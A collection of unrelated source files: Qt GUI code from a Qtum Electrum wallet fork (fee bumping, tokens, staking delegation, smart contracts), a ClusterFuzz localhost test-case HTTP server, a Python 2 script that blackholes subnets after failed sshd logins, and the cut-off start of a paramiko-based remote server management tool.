QGridLayout() grid.setColumnStretch(0,1) w.setLayout(grid) settings_widgets = {} def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int): widget = settings_widgets.get(name) # type: Optional[QWidget] if widget and not p: # plugin got disabled, rm widget grid.removeWidget(widget) widget.setParent(None) settings_widgets.pop(name) elif widget is None and p and p.requires_settings() and p.is_enabled(): # plugin got enabled, add widget widget = settings_widgets[name] = p.settings_widget(d) grid.addWidget(widget, i, 1) def do_toggle(cb, name, i): p = plugins.toggle(name) cb.setChecked(bool(p)) enable_settings_widget(p, name, i) # note: all enabled plugins will receive this hook: run_hook('init_qt', self.gui_object) for i, descr in enumerate(plugins.descriptions.values()): full_name = descr['__name__'] prefix, _separator, name = full_name.rpartition('.') p = plugins.get(name) if 
descr.get('registers_keystore'): continue try: cb = QCheckBox(descr['fullname']) plugin_is_loaded = p is not None cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet) or plugin_is_loaded and p.can_user_disable()) cb.setEnabled(cb_enabled) cb.setChecked(plugin_is_loaded and p.is_enabled()) grid.addWidget(cb, i, 0) enable_settings_widget(p, name, i) cb.clicked.connect(partial(do_toggle, cb, name, i)) msg = descr['description'] if descr.get('requires'): msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires'))) grid.addWidget(HelpButton(msg), i, 2) except Exception: self.logger.exception(f"cannot display plugin {name}") grid.setRowStretch(len(plugins.descriptions.values()), 1) vbox.addLayout(Buttons(CloseButton(d))) d.exec_() def cpfp(self, parent_tx: Transaction, new_tx: PartialTransaction) -> None: total_size = parent_tx.estimated_size() + new_tx.estimated_size() parent_txid = parent_tx.txid() assert parent_txid parent_fee = self.wallet.get_tx_fee(parent_txid) if parent_fee is None: self.show_error(_("Can't CPFP: unknown fee for parent transaction.")) return d = WindowModalDialog(self, _('Child Pays for Parent')) vbox = QVBoxLayout(d) msg = ( "A CPFP is a transaction that sends an unconfirmed output back to " "yourself, with a high fee. The goal is to have miners confirm " "the parent transaction in order to get the fee attached to the " "child transaction.") vbox.addWidget(WWLabel(_(msg))) msg2 = ("The proposed fee is computed using your " "fee/kB settings, applied to the total size of both child and " "parent transactions. After you broadcast a CPFP transaction, " "it is normal to see a new unconfirmed transaction in your history.") vbox.addWidget(WWLabel(_(msg2))) grid = QGridLayout() grid.addWidget(QLabel(_('Total size') + ':'), 0, 0) grid.addWidget(QLabel('%d bytes'% total_size), 0, 1) max_fee = new_tx.output_value() grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0) grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1) output_amount = QLabel('') grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0) grid.addWidget(output_amount, 2, 1) fee_e = BTCAmountEdit(self.get_decimal_point) # FIXME with dyn fees, without estimates, there are all kinds of crashes here combined_fee = QLabel('') combined_feerate = QLabel('') def on_fee_edit(x): fee_for_child = fee_e.get_amount() if fee_for_child is None: return out_amt = max_fee - fee_for_child out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else '' output_amount.setText(out_amt_str) comb_fee = parent_fee + fee_for_child comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else '' combined_fee.setText(comb_fee_str) comb_feerate = comb_fee / total_size * 1000 comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else '' combined_feerate.setText(comb_feerate_str) fee_e.textChanged.connect(on_fee_edit) def get_child_fee_from_total_feerate(fee_per_kb): fee = fee_per_kb * total_size / 1000 - parent_fee fee = min(max_fee, fee) fee = max(total_size, fee) # pay at least 1 sat/byte for combined size return fee suggested_feerate = self.config.fee_per_kb() if suggested_feerate is None: self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''') return fee = get_child_fee_from_total_feerate(suggested_feerate) fee_e.setAmount(fee) grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0) grid.addWidget(fee_e, 3, 1) def on_rate(dyn, pos, fee_rate): fee = 
get_child_fee_from_total_feerate(fee_rate) fee_e.setAmount(fee) fee_slider = FeeSlider(self, self.config, on_rate) fee_combo = FeeComboBox(fee_slider) fee_slider.update() grid.addWidget(fee_slider, 4, 1) grid.addWidget(fee_combo, 4, 2) grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0) grid.addWidget(combined_fee, 5, 1) grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0) grid.addWidget(combined_feerate, 6, 1) vbox.addLayout(grid) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if not d.exec_(): return fee = fee_e.get_amount() if fee is None: return # fee left empty, treat is as "cancel" if fee > max_fee: self.show_error(_('Max fee exceeded')) return new_tx = self.wallet.cpfp(parent_tx, fee) new_tx.set_rbf(True) self.show_transaction(new_tx) def bump_fee_dialog(self, tx: Transaction): txid = tx.txid() assert txid fee = self.wallet.get_tx_fee(txid) if fee is None: self.show_error(_("Can't bump fee: unknown fee for original transaction.")) return tx_label = self.wallet.get_label_for_txid(txid) tx_size = tx.estimated_size() old_fee_rate = fee / tx_size # sat/vbyte d = WindowModalDialog(self, _('Bump Fee')) vbox = QVBoxLayout(d) vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool."))) grid = QGridLayout() grid.addWidget(QLabel(_('Current Fee') + ':'), 0, 0) grid.addWidget(QLabel(self.format_amount(fee) + ' ' + self.base_unit()), 0, 1) grid.addWidget(QLabel(_('Current Fee rate') + ':'), 1, 0) grid.addWidget(QLabel(self.format_fee_rate(1000 * old_fee_rate)), 1, 1) grid.addWidget(QLabel(_('New Fee rate') + ':'), 2, 0) def on_textedit_rate(): fee_slider.deactivate() feerate_e = FeerateEdit(lambda: 0) feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1)) feerate_e.textEdited.connect(on_textedit_rate) grid.addWidget(feerate_e, 2, 1) def on_slider_rate(dyn, pos, fee_rate): fee_slider.activate() if fee_rate is not None: feerate_e.setAmount(fee_rate / 1000) fee_slider = FeeSlider(self, self.config, on_slider_rate) fee_combo = FeeComboBox(fee_slider) fee_slider.deactivate() grid.addWidget(fee_slider, 3, 1) grid.addWidget(fee_combo, 3, 2) vbox.addLayout(grid) cb = QCheckBox(_('Final')) vbox.addWidget(cb) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if not d.exec_(): return is_final = cb.isChecked() new_fee_rate = feerate_e.get_amount() try: new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, coins=self.get_coins()) except CannotBumpFee as e: self.show_error(str(e)) return if is_final: new_tx.set_rbf(False) self.show_transaction(new_tx, tx_desc=tx_label) def dscancel_dialog(self, tx: Transaction): txid = tx.txid() assert txid fee = self.wallet.get_tx_fee(txid) if fee is None: self.show_error(_('Cannot cancel transaction') + ': ' + _('unknown fee for original transaction')) return tx_size = tx.estimated_size() old_fee_rate = fee / tx_size # sat/vbyte d = WindowModalDialog(self, _('Cancel transaction')) vbox = QVBoxLayout(d) vbox.addWidget(WWLabel(_("Cancel an unconfirmed RBF transaction by double-spending " "its inputs back to your wallet with a higher fee."))) grid = QGridLayout() grid.addWidget(QLabel(_('Current Fee') + ':'), 0, 0) grid.addWidget(QLabel(self.format_amount(fee) + ' ' + self.base_unit()), 0, 1) grid.addWidget(QLabel(_('Current Fee rate') + ':'), 1, 0) grid.addWidget(QLabel(self.format_fee_rate(1000 * old_fee_rate)), 1, 1) grid.addWidget(QLabel(_('New Fee rate') + ':'), 2, 0) def on_textedit_rate(): fee_slider.deactivate() feerate_e = FeerateEdit(lambda: 0) feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate 
+ 1)) feerate_e.textEdited.connect(on_textedit_rate) grid.addWidget(feerate_e, 2, 1) def on_slider_rate(dyn, pos, fee_rate): fee_slider.activate() if fee_rate is not None: feerate_e.setAmount(fee_rate / 1000) fee_slider = FeeSlider(self, self.config, on_slider_rate) fee_combo = FeeComboBox(fee_slider) fee_slider.deactivate() grid.addWidget(fee_slider, 3, 1) grid.addWidget(fee_combo, 3, 2) vbox.addLayout(grid) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if not d.exec_(): return new_fee_rate = feerate_e.get_amount() try: new_tx = self.wallet.dscancel(tx=tx, new_fee_rate=new_fee_rate) except CannotDoubleSpendTx as e: self.show_error(str(e)) return self.show_transaction(new_tx) def save_transaction_into_wallet(self, tx: Transaction): win = self.top_level_window() try: if not self.wallet.add_transaction(tx): win.show_error(_("Transaction could not be saved.") + "\n" + _("It conflicts with current history.")) return False except AddTransactionException as e: win.show_error(e) return False else: self.wallet.save_db() # need to update at least: history_list, utxo_list, address_list self.need_update.set() msg = (_("Transaction added to wallet history.") + '\n\n' + _("Note: this is an offline transaction, if you want the network " "to see it, you need to broadcast it.")) win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg) return True def show_cert_mismatch_error(self): if self.showing_cert_mismatch_error: return self.showing_cert_mismatch_error = True self.show_critical(title=_("Certificate mismatch"), msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" + _("Electrum will now exit.")) self.showing_cert_mismatch_error = False self.close() def disable_opsender(self) -> bool: return self.config.get("disable_opsender", True) or \ self.network.get_server_height() <= constants.net.QIP5_FORK_HEIGHT def set_token(self, token: 'Token'): self.wallet.add_token(token) self.token_balance_list.update() self.token_hist_list.update() self.token_hist_model.refresh('set_token') def delete_token(self, key: str): token_name = self.wallet.db.get_token(key).name if not self.question(_("Remove {} from your token list ?") .format(token_name)): return self.wallet.delete_token(key) self.token_balance_list.update() self.token_hist_model.refresh('delete_token') def create_tokens_tab(self): from .token_list import TokenBalanceList, TokenHistoryModel, TokenHistoryList self.token_balance_list = tbl = TokenBalanceList(self) self.token_hist_model = TokenHistoryModel(self) self.token_hist_list = thl = TokenHistoryList(self, self.token_hist_model) self.token_hist_model.set_view(self.token_hist_list) splitter = QSplitter(self) splitter.addWidget(tbl) splitter.addWidget(thl) splitter.setOrientation(Qt.Vertical) return splitter def token_add_dialog(self): if isinstance(self.wallet.keystore, TrezorKeyStore): self.show_message('Trezor does not support QRC20 Token for now') return d = TokenAddDialog(self) d.show() def token_info_dialog(self, token: 'Token'): d = TokenInfoDialog(self, token) d.show() def token_send_dialog(self, token: 'Token'): d = TokenSendDialog(self, token) d.show() def do_token_pay(self, token: 'Token', pay_to: str, amount: int, gas_limit: int, gas_price: int, dialog, preview=False): try: datahex = 'a9059cbb{}{:064x}'.format(pay_to.zfill(64), amount) op_sender = None if self.disable_opsender() else token.bind_addr script = contract_script(gas_limit, gas_price, datahex, token.contract_addr, 
opcodes.OP_CALL, op_sender) outputs = [PartialTxOutput(scriptpubkey=script, value=0)] tx_desc = _('Pay out {} {}').format(amount / (10 ** token.decimals), token.symbol) self._smart_contract_broadcast(outputs, tx_desc, gas_limit * gas_price, token.bind_addr, dialog, None, preview) except (BaseException,) as e: traceback.print_exc(file=sys.stderr) dialog.show_message(str(e)) def set_delegation(self, dele: 'Delegation'): self.wallet.add_delegation(dele) self.delegation_list.update() def delete_delegation(self, addr: str): self.wallet.delete_delegation(addr) self.delegation_list.update() def call_add_delegation(self, addr: str, staker: str, fee: int, gas_limit: int, gas_price: int, dialog, pod: Optional[bytes]): """ :param staker: hash160 str """ password = None if self.wallet.has_keystore_encryption(): password = self.password_dialog(_("Enter your password to proceed")) if not password: return if not pod: pod = self.wallet.sign_message(addr, staker, password) if len(pod) != 65: raise Exception("incorrect POD length") args = [staker.lower(), fee, pod] self.sendto_smart_contract(DELEGATION_CONTRACT, DELEGATE_ABI[1], args, gas_limit, gas_price, 0, addr, dialog, False, tx_desc="update delegation") def call_remove_delegation(self, addr: str, gas_limit: int, gas_price: int, dialog): self.sendto_smart_contract(DELEGATION_CONTRACT, DELEGATE_ABI[0], [], gas_limit, gas_price, 0, addr, dialog, False, tx_desc="remove delegation") def create_delegations_tab(self): from .delegation_list import DelegationList self.delegation_list = l = DelegationList(self) return self.create_list_tab(l) def delegation_dialog(self, dele: 'Delegation' = None, mode='add'): if isinstance(self.wallet.keystore, TrezorKeyStore): self.show_message('Trezor does not support staking delegation for now') return if self.network.get_server_height() < constants.net.OFFLINE_STAKE_HEIGHT: self.show_message('Offline staking not activated') return d = DelegationDialog(self, dele, mode) d.show() def _smart_contract_broadcast(self, outputs: list, desc: str, gas_fee: int, sender: str, dialog, broadcast_done=None, preview=False): addr_type, __ = b58_address_to_hash160(sender) if not addr_type == constants.net.ADDRTYPE_P2PKH: dialog.show_message(_('only P2PKH address can call contract')) return coins = self.get_coins() make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(coins=coins, outputs=outputs, fee=fee_est, change_addr=sender, gas_fee=gas_fee, sender=sender, is_sweep=False) output_values = [x.value for x in outputs] if output_values.count('!') > 1: self.show_error(_("More than one output set to spend max")) return output_value = '!' if '!' in output_values else sum(output_values) try: d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=False, gas_fee=gas_fee) except SenderNoUTXOException as e: self.show_error(str(e)) return if d.not_enough_funds: # Check if we had enough funds excluding fees, # if so, still provide opportunity to set lower fees. if not d.have_enough_funds_assuming_zero_fees(): self.show_message(_('Not Enough Funds')) return # shortcut to advanced preview (after "enough funds" check!) 
if preview or self.config.get('advanced_preview'): self.preview_tx_dialog(make_tx=make_tx) return cancelled, is_send, password, tx = d.run() if cancelled: return if tx is None: self.show_message(_('transaction is None')) return if is_send: def sign_done(success): if success: self.broadcast_or_show(tx, broadcast_done=broadcast_done) if desc is not None: self.wallet.set_label(tx.txid(), desc) self.sign_tx_with_password(tx, callback=sign_done, password=password) else: self.preview_tx_dialog(make_tx=make_tx) def create_smart_contract_tab(self): from .smart_contract_list import SmartContractList self.smart_contract_list = l = SmartContractList(self) return self.create_list_tab(l) def set_smart_contract(self, name: str, address: str, interface: list) -> bool: if not is_hash160(address): self.show_error(_('Invalid Address')) self.smart_contract_list.update() return False self.wallet.db.smart_contracts[address] = (name, interface) self.smart_contract_list.update() return True def delete_samart_contact(self, address: str) -> bool: if not self.question(_("Remove {} from your list of smart contracts?".format( self.wallet.db.smart_contracts[address][0]))): return False self.wallet.db.smart_contracts.pop(address) self.smart_contract_list.update() return True def call_smart_contract(self, address: str, func: dict, args: list, sender: str, dialog): data = eth_abi_encode(func, args) try: result = self.network.run_from_another_thread(self.network.call_contract(address, data, sender)) except BaseException as e: self.logger.exception('') dialog.show_message(str(e)) return types = list([x['type'] for x in func.get('outputs', [])]) try: if isinstance(result, dict): except_msg = result.get('executionResult', {}).get('exceptedMessage', '') if len(except_msg) > 1: dialog.show_message(f"exceptedMessage: {except_msg}") return output = eth_abi.decode_abi(types, binascii.a2b_hex(result['executionResult']['output'])) else: output = eth_abi.decode_abi(types, binascii.a2b_hex(result)) def decode_x(x): if isinstance(x, bytes): try: return x.decode() except UnicodeDecodeError: return str(x) return str(x) output = ','.join([decode_x(x) for x in output]) dialog.show_message(output) except (BaseException,) as e: self.logger.exception('') dialog.show_message(f'{e} {result}') def sendto_smart_contract(self, address: str, func: dict, args: list, gas_limit: int, gas_price: int, amount: int, sender: str, dialog, preview, tx_desc=None): try: abi_encoded = eth_abi_encode(func, args) op_sender = None if self.disable_opsender() else sender script = contract_script(gas_limit, gas_price, abi_encoded, address, opcodes.OP_CALL, op_sender) outputs = [PartialTxOutput(scriptpubkey=script, value=amount)] if tx_desc is None: tx_desc = 'contract sendto {}'.format(self.wallet.db.smart_contracts.get(address, [address, ])[0]) self._smart_contract_broadcast(outputs, tx_desc, gas_limit * gas_price, sender, dialog, None, preview) except (BaseException,) as e: self.logger.exception('') dialog.show_message(str(e)) def create_smart_contract(self, name: str, bytecode: str, abi: list, constructor: dict, args: list, gas_limit: int, gas_price: int, sender: str, dialog, preview): def broadcast_done(tx): s = tx.outputs()[0].scriptpubkey if decode_opcreate_script(s) or decode_opsender_script(s): reversed_txid = binascii.a2b_hex(tx.txid())[::-1] output_index = b'\x00\x00\x00\x00' contract_addr = hash_160(reversed_txid + output_index).hex() self.set_smart_contract(name, contract_addr, abi) else: self.logger.debug("the smart contract created seems to be 
invalid") try: abi_encoded = '' if constructor: abi_encoded = eth_abi_encode(constructor, args) op_sender = None if self.disable_opsender() else sender script = contract_script(gas_limit, gas_price, bytecode + abi_encoded, None, opcodes.OP_CREATE, op_sender) outputs = [PartialTxOutput(scriptpubkey=script, value=0)] self._smart_contract_broadcast(outputs, 'create contract {}'.format(name), gas_limit * gas_price, sender, dialog, broadcast_done, preview) except (BaseException,) as e: self.logger.exception('') dialog.show_message(str(e)) def contract_create_dialog(self): d = ContractCreateDialog(self) d.show() def contract_add_dialog(self): d = ContractEditDialog(self) d.show() def contract_edit_dialog(self, address: str): name, interface = self.wallet.db.smart_contracts[address] contract = { 'name': name, 'interface': interface, 'address': address } d = ContractEditDialog(self, contract) d.show() def contract_func_dialog(self, address: str): name, interface = self.wallet.db.smart_contracts[address] contract = { 'name': name, 'interface': interface, 'address': address } d = ContractFuncDialog(self, contract) d.show()
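The call data built in do_token_pay above ('a9059cbb' + padded recipient + padded amount) is the standard QRC20/ERC20 transfer(address,uint256) ABI encoding. Below is a minimal standalone sketch of just that encoding step, with a hypothetical recipient hash160 and amount; it does not build the OP_CALL contract script or touch the wallet code.

# Hypothetical helper; mirrors the format string used in do_token_pay.
def qrc20_transfer_data(recipient_hash160_hex: str, amount: int) -> str:
    selector = 'a9059cbb'                        # transfer(address,uint256) selector
    to_field = recipient_hash160_hex.zfill(64)   # 20-byte hash160, left-padded to 32 bytes
    amount_field = '{:064x}'.format(amount)      # uint256 amount, 32 bytes, big-endian
    return selector + to_field + amount_field

# Example: 1.5 tokens with 8 decimals to a made-up hash160.
print(qrc20_transfer_data('11' * 20, int(1.5 * 10 ** 8)))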
http_server.py
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Runs http(s) server in the background."""

from future import standard_library
standard_library.install_aliases()
import http.server
import mimetypes
import os
import socket
import threading

from system import environment


def get_absolute_testcase_file(request_path):
  """Search the input directory and additional paths for the requested file."""
  # Gather the list of search path directories.
  current_working_directory = os.getcwd()
  data_directory = environment.get_value('FUZZ_DATA')
  input_directory = environment.get_value('INPUT_DIR')
  fuzzer_directory = environment.get_value('FUZZERS_DIR')
  layout_tests_directory = os.path.join(data_directory, 'LayoutTests')
  layout_tests_http_tests_directory = os.path.join(layout_tests_directory,
                                                   'http', 'tests')
  layout_tests_wpt_tests_directory = os.path.join(layout_tests_directory,
                                                  'external', 'wpt')

  # TODO(mbarbella): Add support for aliasing and directories from
  # https://cs.chromium.org/chromium/src/third_party/blink/tools/blinkpy/web_tests/servers/apache_http.py?q=apache_http.py&sq=package:chromium&dr&l=60

  # Check all search paths for the requested file.
  search_paths = [
      current_working_directory,
      fuzzer_directory,
      input_directory,
      layout_tests_directory,
      layout_tests_http_tests_directory,
      layout_tests_wpt_tests_directory,
  ]

  for search_path in search_paths:
    base_string = search_path + os.path.sep
    path = request_path.lstrip('/')
    if not path or path.endswith('/'):
      path += 'index.html'

    absolute_path = os.path.abspath(os.path.join(search_path, path))
    if (absolute_path.startswith(base_string) and
        os.path.exists(absolute_path) and not os.path.isdir(absolute_path)):
      return absolute_path

  return None


def guess_mime_type(filename):
  """Guess mime type based of file extension."""
  if not mimetypes.inited:
    mimetypes.init()

  return mimetypes.guess_type(filename)[0]


class BotHTTPServer(http.server.HTTPServer):
  """Host the bot's test case directories over HTTP."""

  def __init__(self, server_address, handler_class):
    http.server.HTTPServer.__init__(self, server_address, handler_class)

  def _handle_request_noblock(self):
    """Process a single http request."""
    try:
      request, client_address = self.get_request()
    except socket.error:
      return

    if self.verify_request(request, client_address):
      try:
        self.process_request(request, client_address)
      except:
        self.close_request(request)


class RequestHandler(http.server.BaseHTTPRequestHandler):
  """Handler for get requests to test cases."""

  def do_GET(self):  # pylint: disable=invalid-name
    """Handle a GET request."""
    absolute_path = get_absolute_testcase_file(self.path)
    if not absolute_path:
      self.send_response(404)
      self.end_headers()
      return

    try:
      with open(absolute_path) as file_handle:
        data = file_handle.read()
    except IOError:
      self.send_response(403)
      self.end_headers()
      return

    self.send_response(200, 'OK')

    # Send a content type header if applicable.
    mime_type = guess_mime_type(absolute_path)
    if mime_type:
      self.send_header('Content-type', mime_type)

    self.end_headers()
    self.wfile.write(data)

  def log_message(self, fmt, *args):  # pylint: disable=arguments-differ
    """Do not output a log entry to stderr for every request made."""


def run_server(host, port):
  """Run the HTTP server on the given port."""
  httpd = BotHTTPServer((host, port), RequestHandler)
  httpd.serve_forever()


def port_is_open(host, port):
  socket_handle = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  result = socket_handle.connect_ex((host, port))
  socket_handle.close()
  return result == 0


def start_server_thread(host, port):
  server = threading.Thread(target=run_server, args=(host, port))
  server.daemon = True
  server.start()


def start():
  """Initialize the HTTP server on the specified ports."""
  http_host = 'localhost'
  http_port_1 = environment.get_value('HTTP_PORT_1', 8000)
  http_port_2 = environment.get_value('HTTP_PORT_2', 8080)

  if not port_is_open(http_host, http_port_1):
    start_server_thread(http_host, http_port_1)
  if not port_is_open(http_host, http_port_2):
    start_server_thread(http_host, http_port_2)
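A hedged usage sketch for the server above, assuming the file is importable as http_server, that the system.environment values it reads (FUZZ_DATA, INPUT_DIR, FUZZERS_DIR, HTTP_PORT_1, HTTP_PORT_2) are set, and that an index.html exists on one of the search paths; none of this is part of the module itself.

from urllib.request import urlopen

import http_server  # assumed module name for the file above

http_server.start()  # background servers on ports 8000 and 8080 by default
response = urlopen('http://localhost:8000/')  # '/' resolves to index.html in do_GET
print(response.getcode(), response.read()[:80])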
main.py
#!/usr/bin/python # "tail" based on http://stackoverflow.com/a/12523302 # "2>/dev/null" based on http://stackoverflow.com/a/11269627 import threading, Queue, subprocess, re, os, signal, sys tailq = Queue.Queue(maxsize=10) state = [] class Subnet(object): cidr = '0.0.0.0/0' binary = '0' * 32 size = 0 def __init__(self, cidr): # self.cidr = cidr self.binary = Subnet.bits(cidr.split('/')[0]) self.size = int(cidr.split('/')[1]) # normalize, ex. 10/8 to 10.0.0.0/8 self.cidr = Subnet.bin2cidr(self.binary, self.size) def __repr__(self): return '<Subnet %s>' % self.cidr def __cmp__(self, other): return other.size - self.size def __eq__(self, other): return self.cidr == other.cidr def contains(self, other): if self <= other: return False return self.binary[:self.size] == other.binary[:self.size] @classmethod def bin2char(cls, b): c = 0 b = b[::-1] for i in range(8): c += (2 ** i) if b[i] == '1' else 0 return c @classmethod def bin2cidr(cls, b, p): r = [] for i in range(4): r.append(str(Subnet.bin2char(b[i * 8:i * 8 + 8]))) return '%s/%d' % ('.'.join(r), p) @classmethod def bits(cls, ipaddr): n = 0 r = [] for s in ipaddr.split('.'): r.append('{:08b}'.format(int(s))) return ''.join(r).ljust(32, '0') @classmethod def from_range(cls, lo, hi): blo = Subnet.bits(lo) bhi = Subnet.bits(hi) p = 0 for i in range(32): if blo[i] == bhi[i]: p += 1 else: break s = blo[0:p] + ('0' * 32) return cls(Subnet.bin2cidr(s, p)) @classmethod def from_ipaddr(cls, ipaddr): return cls('%s/32' % ipaddr) class Block(object): subnet = None left = 0 engaged = False def __repr__(self): return '[%s Block %s]' % \ ('Engaged' if self.engaged else 'Pending', self.subnet) def __init__(self, subnet, left=1): self.subnet = subnet self.left = left self.strike() def __eq__(self, other): return self.subnet == other.subnet def strike(self): if self.engaged: return self.left -= 1 print ' %s: %d left' % (self, self.left) if self.left <= 0: self.engage() def __del__(self): if self.engaged: self.iproute(['delete', 'blackhole', self.subnet.cidr]) def engage(self): self.iproute(['add', 'blackhole', self.subnet.cidr]) self.engaged = True print ' %s' % self def iproute(self, cmd=[]): cmd = ['ip', 'route'] + cmd print ' calling: %s' % ' '.join(cmd) try: with open(os.devnull, 'wb') as devnull: subprocess.call(cmd, stderr=devnull) except Exception, e: print e def whois(refer, ipaddr): lines = '' new_refer = False subnets = [] try: lines = subprocess.check_output(['/usr/bin/whois', '-h', refer, ipaddr], stderr=subprocess.STDOUT) except subprocess.CalledProcessError, e: lines = e.output for line in lines.split('\n'): line = line.lower() if line.startswith('refer:'): m = re.findall(r'[^:\t\ ]+$', line) if m: new_refer = m[0] if line.startswith('inetnum:') or line.startswith('cidr'): m = re.findall(r'[\d\.]+\/\d{1,2}', line) if m: for cidr in m: subnets.append(Subnet(cidr)) else: m = re.findall(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', line) if len(m) == 2: subnets.append(Subnet.from_range(m[0], m[1])) if new_refer: return whois(new_refer, ipaddr) else: return subnets def blackhole(ipaddr): global state subnets = whois('whois.iana.org', ipaddr) single = Subnet.from_ipaddr(ipaddr) skip = False for b in state: if b.subnet.contains(single) and b.engaged: skip = True print ' %s contains %s' % (b, single) elif b.subnet == single and b.engaged: skip = True print ' %s exists' % b if not skip: state.append(Block(single)) if subnets: s = min(subnets) nb = next((ib for ib in state if ib.subnet == s), None) if nb: nb.strike() if nb.engaged: for b in state: if b != nb 
and nb.subnet.contains(b.subnet): print ' consolidating %s' % b state.remove(b) else: state.append(Block(s, left=3)) def tail_forever(): try: p = subprocess.Popen( ["/usr/bin/journalctl", "-D", "/var/log/journal", "_COMM=sshd", "-o", "cat", "-f", "-n", "100"], stdout=subprocess.PIPE) while True: line = p.stdout.readline() tailq.put(line) if not line: break finally: p.terminate() def sigterm_handler(sig, frame): sys.exit() signal.signal(signal.SIGTERM, sigterm_handler) th = threading.Thread(target=tail_forever) th.start() try: while True: line = tailq.get() m = re.match('Invalid user .* from ([0-9\.]*)', line) \ or re.match('User .* from ([0-9\.]*) not allowed', line) \ or re.match('Received disconnect from ([0-9\.]*):.*\[preauth\]', line) \ or re.match('Failed password for .* from ([0-9\.]*) port [0-9]+ ssh2', line) \ or re.match('Did not receive identification string from ([0-9\.]*)', line) \ or re.match('Unable to negotiate with ([0-9\.]*)', line) if m: ipaddr = m.group(1) print print ipaddr blackhole(ipaddr) except Exception, e: print e finally: print print 'cleaning up' while True: try: b = state.pop() del b except: break th.join()
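Subnet.from_range above collapses a whois inetnum range to the covering CIDR prefix, which is what eventually gets blackholed after enough strikes. A standalone Python 3 re-implementation of that longest-common-prefix step (a hypothetical helper; the script itself targets Python 2 and is not imported here):

def range_to_cidr(lo: str, hi: str) -> str:
    def bits(ip):  # dotted quad -> 32-character bit string, like Subnet.bits
        return ''.join('{:08b}'.format(int(octet)) for octet in ip.split('.'))
    blo, bhi = bits(lo), bits(hi)
    prefix = 0
    while prefix < 32 and blo[prefix] == bhi[prefix]:
        prefix += 1
    network = blo[:prefix].ljust(32, '0')
    octets = [str(int(network[i:i + 8], 2)) for i in range(0, 32, 8)]
    return '{}/{}'.format('.'.join(octets), prefix)

# whois often reports e.g. "inetnum: 203.0.113.0 - 203.0.113.255":
print(range_to_cidr('203.0.113.0', '203.0.113.255'))  # -> 203.0.113.0/24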
LazyManage.py
#!/usr/bin/python #encoding:utf8 #LzayManage.py #config file: serverlist.conf #By:peter.li #2014-01-07 #LazyManage.py version update address: #http://pan.baidu.com/s/1sjsFrmX #https://github.com/liquanzhou/ops_doc import paramiko import multiprocessing import sys,os,time,socket,re def Ssh_Cmd(host_ip,Cmd,user_name,user_pwd,port=22): s = paramiko.SSHClient() s.load_system_host_keys() s.set_missing_host_key_policy(paramiko.AutoAddPolicy()) s.connect(hostname=host_ip,port=port,username=user_name,password=user_pwd) stdin,stdout,stderr = s.exec_command(Cmd) Result = '%s%s' %(stdout.read(),stderr.read()) q.put('successful') s.close() return Result.strip() def Ssh_Su_Cmd(host_ip,Cmd,user_name,user_pwd,root_name,root_pwd,port=22): s = paramiko.SSHClient() s.load_system_host_keys() s.set_missing_host_key_policy(paramiko.AutoAddPolicy()) s.connect(hostname=host_ip,port=port,username=user_name,password=user_pwd) ssh = s.invoke_shell() time.sleep(0.1) ssh.send('su - %s\n' %(root_name)) buff = '' while not buff.endswith('Password: '): resp = ssh.recv(9999) buff +=resp ssh.send('%s\n' %(root_pwd)) buff = '' while True: resp = ssh.recv(9999) buff +=resp if ': incorrect password' in buff: su_correct='passwd_error' break elif buff.endswith('# '): su_correct='passwd_correct' break if su_correct == 'passwd_correct': ssh.send('%s\n' %(Cmd)) buff = '' while True: resp = ssh.recv(9999) if resp.endswith('# '): buff +=re.sub('\[.*@.*\]# $','',resp) break buff +=resp Result = buff.lstrip('%s' %(Cmd)) q.put('successful') elif su_correct == 'passwd_error': Result = "\033[31mroot密码错误\033[m" s.close() return Result.strip() def Send_File(host_ip,PathList,user_name,user_pwd,Remote='/tmp',port=22): s=paramiko.Transport((host_ip,port)) s.connect(username=user_name,password=user_pwd) sftp=paramiko.SFTPClient.from_transport(s) for InputPath in PathList: LocalPath = re.sub('^\./','',InputPath.rstrip('/')) RemotePath = '%s/%s' %( Remote , os.path.basename( LocalPath )) try: sftp.rmdir(RemotePath) except: pass try: sftp.remove(RemotePath) except: pass if os.path.isdir(LocalPath): sftp.mkdir(RemotePath) for path,dirs,files in os.walk(LocalPath): for dir in dirs: dir_path = os.path.join(path,dir) sftp.mkdir('%s/%s' %(RemotePath,re.sub('^%s/' %LocalPath,'',dir_path))) for file in files: file_path = os.path.join(path,file) sftp.put( file_path,'%s/%s' %(RemotePath,re.sub('^%s/' %LocalPath,'',file_path))) else: 